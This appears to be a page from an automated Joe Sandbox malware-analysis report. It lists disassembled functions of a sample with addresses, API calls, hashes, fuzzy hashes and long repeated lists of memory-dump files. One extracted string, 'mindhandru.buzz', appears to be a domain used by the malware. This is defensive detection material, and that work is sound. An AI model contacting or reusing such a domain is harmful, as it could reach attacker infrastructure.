Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: \$\$\$]$]$]$^$^$^$_$_$_
API String ID: 0-1108506012
Opcode ID: 50b857726e911c6fe5f5848230ff7a8ecb8a0783ad02fe9946931dab51517d96
Instruction ID: 4b6337b115a601a3a65f7ec6aee9c89f6487c83a6122910dc962fe273eb0d539
Opcode Fuzzy Hash: 50b857726e911c6fe5f5848230ff7a8ecb8a0783ad02fe9946931dab51517d96
Instruction Fuzzy Hash: FEB1297264C7858FD3149A28CC8836BBFD29BC6324F1D4B2DE5E9473C2C6B9C8859746

Function 009739B9 Relevance: 14.8, APIs: 2, Strings: 6, Instructions: 822
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_^]\, xrefs: 00973865
+A#C, xrefs: 00973D15
=]=_, xrefs: 00973D0E
eN, xrefs: 009741BA
rp, xrefs: 00973FF3
#E#G, xrefs: 00973D1C

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: #E#G$+A#C$=]=_$_^]\$eN$rp
API String ID: 0-3333364358
Opcode ID: d12f629949e2f29dad6b6d93c760a75ecaabc67e3365617fb6b9596611156814
Instruction ID: 9be81b8098340c8240491acb8dccb894e01750a30fc7aeb31bad39ecc4f559ab
Opcode Fuzzy Hash: d12f629949e2f29dad6b6d93c760a75ecaabc67e3365617fb6b9596611156814
Instruction Fuzzy Hash: 134258B2A18201CFDB14CF69C8816AABBB2FF89310F19C1ADD8459B395D734D952CB91

Function 00973B50 Relevance: 12.8, APIs: 2, Strings: 5, Instructions: 600
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00973C37
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00973CB1

Strings

+A#C, xrefs: 00973D15
=]=_, xrefs: 00973D0E
eN, xrefs: 009741BA
rp, xrefs: 00973FF3
#E#G, xrefs: 00973D1C

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: #E#G$+A#C$=]=_$eN$rp
API String ID: 237503144-3451580660
Opcode ID: 0c7a334a05402eb6fe187b64208c3d8014b22e90a271b20aa16ae9db9841299f
Instruction ID: 8c9bc46e34979aa686a349ee0b6d8bf1ff784f5eb22b0416aefc7148e7e8cca8
Opcode Fuzzy Hash: 0c7a334a05402eb6fe187b64208c3d8014b22e90a271b20aa16ae9db9841299f
Instruction Fuzzy Hash: CA1238B2A14215CFDB14CF69C8826AABBB2FF85310F19C1ACD845AF355D7389942CBD1

Function 0095CE45 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 342
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0095CE56

Strings

mindhandru.buzz, xrefs: 0095D266
`{tu, xrefs: 0095D1A8
6=.), xrefs: 0095CF3B
<1!9, xrefs: 0095CF34

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID: Uninitialize
String ID: 6=.)$<1!9$`{tu$mindhandru.buzz
API String ID: 3861434553-915130382
Opcode ID: 0ec59150602fda6a6e2f44bcdf73f4af254ba665ef52bacf95c999e6e87d49ac
Instruction ID: 29c0b57f1158511f7c9150e109f8a0b00382daaa5eb413caccfb39602934f93a
Opcode Fuzzy Hash: 0ec59150602fda6a6e2f44bcdf73f4af254ba665ef52bacf95c999e6e87d49ac
Instruction Fuzzy Hash: 9CA105B41057818FD726CF2AC4D0662BFE2FF96311B18859CC8D24F79AD335A84ACB51

Function 00958600 Relevance: 4.1, Strings: 3, Instructions: 356
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

}, xrefs: 0095890C
b]u), xrefs: 00958877
}, xrefs: 00958913

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID: FreeLibrary
String ID: b]u)$}$}
API String ID: 3664257935-2900034282
Opcode ID: fbdfafbd3041c525da0df1e0a19c02312d259e2875ab36248378e14e57191c27
Instruction ID: 2fef734ef569d137af360b8c9bb614359f165450d84bd03ec3f76bed64c76f1c
Opcode Fuzzy Hash: fbdfafbd3041c525da0df1e0a19c02312d259e2875ab36248378e14e57191c27
Instruction Fuzzy Hash: 4EC1E673E187144BC718DF69C84135AF7D6ABC8710F1AC92EA898EB391EA74DC058BC5

Function 0097D34A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 0097D3EE

Strings

><+, xrefs: 0097D353

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: ><+
API String ID: 3960555810-2918635699
Opcode ID: 424eccbd6bb428bdf95406b7db8eaa175093ffe63a4bfaf0942e8384b2a90abd
Instruction ID: deec64f998cc36781a2f78b64ec63c8254379a0362b785841daca0311ef11234
Opcode Fuzzy Hash: 424eccbd6bb428bdf95406b7db8eaa175093ffe63a4bfaf0942e8384b2a90abd
Instruction Fuzzy Hash: A2C1EF756047428FD725CF2AC490722FBF2AF9A314B28C59ED4DA9B792C735E802CB50

Function 00990D20 Relevance: 2.9, Strings: 2, Instructions: 425COMMON

Download Yara Rule

Strings

, xrefs: 00990DC3, 00990EAB
@Ukx, xrefs: 00990F53

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
